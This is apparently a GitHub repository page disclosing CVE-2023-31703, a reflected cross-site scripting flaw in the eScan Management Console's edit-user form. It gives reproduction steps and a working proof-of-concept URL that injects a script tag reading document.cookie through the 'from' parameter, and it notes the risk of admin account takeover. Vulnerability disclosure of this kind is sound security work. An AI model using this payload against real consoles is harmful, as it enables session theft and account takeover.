Skip to content

Cross Site Scripting (XSS) in eScan Management Console

Notifications You must be signed in to change notification settings

sahiloj/CVE-2023-31703

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

eScan Management Console 14.0.1400.2281 - Cross Site Scripting

Description: Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter in the URL directly.

Vulnerable Product Version: 14.0.1400.2281

Date: 16/05/2023

CVE: CVE-2023-31703

CVE Author: Sahil Ojha

Vendor Homepage: https://www.escanav.com

Software Link: https://cl.escanav.com/ewconsole.dll

Tested on: Windows

Steps to reproduce:

  1. Login into the eScan Management Console with a valid user credential.
  2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
  3. Now, Inject the Cross Site Scripting Payload in "from" parameter as shown below and a valid XSS pop up appeared. https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P= https://github.com/sahiloj/CVE-2023-31703/blob/main/XSS%201.png
  4. By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover. HTML Render

About

Cross Site Scripting (XSS) in eScan Management Console

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published